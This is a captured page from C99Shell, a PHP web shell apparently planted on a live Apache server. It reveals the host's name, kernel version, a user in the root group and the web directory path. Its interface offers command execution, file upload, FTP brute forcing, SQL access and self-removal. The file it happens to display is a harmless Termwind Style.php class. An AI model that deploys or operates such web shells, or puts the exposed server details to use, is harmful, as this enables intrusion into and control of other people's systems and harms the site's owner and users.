!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/smabpro.picotech.app/public_html/vendor/nunomaduro/termwind/src/ValueObjects/   drwxr-xr-x
Free 28.52 GB of 117.98 GB (24.18%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Style.php (1.54 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

declare(strict_types=1);

namespace 
Termwind\ValueObjects;

use 
Closure;
use 
Termwind\Actions\StyleToMethod;
use 
Termwind\Exceptions\InvalidColor;

/**
 * @internal
 */
final class Style
{
    
/**
     * Creates a new value object instance.
     *
     * @param Closure(Styles $styles, string|int ...$argument): Styles  $callback
     */
    
public function __construct(private Closure $callback, private string $color '')
    {
        
// ..
    
}

    
/**
     * Apply the given set of styles to the styles.
     */
    
public function apply(string $styles): void
    
{
        
$callback = clone $this->callback;

        
$this->callback = static function (
            
Styles $formatter,
            
string|int ...$arguments
        
) use ($callback$styles): Styles {
            
$formatter $callback($formatter, ...$arguments);

            return 
StyleToMethod::multiple($formatter$styles);
        };
    }

    
/**
     * Sets the color to the style.
     */
    
public function color(string $color): void
    
{
        if (
preg_match('/^#([A-Fa-f0-9]{6}|[A-Fa-f0-9]{3})$/'$color) < 1) {
            throw new 
InvalidColor(sprintf('The color %s is invalid.'$color));
        }

        
$this->color $color;
    }

    
/**
     * Gets the color.
     */
    
public function getColor(): string
    
{
        return 
$this->color;
    }

    
/**
     * Styles the given formatter with this style.
     */
    
public function __invoke(Styles $stylesstring|int ...$arguments): Styles
    
{
        return (
$this->callback)($styles, ...$arguments);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0041 ]--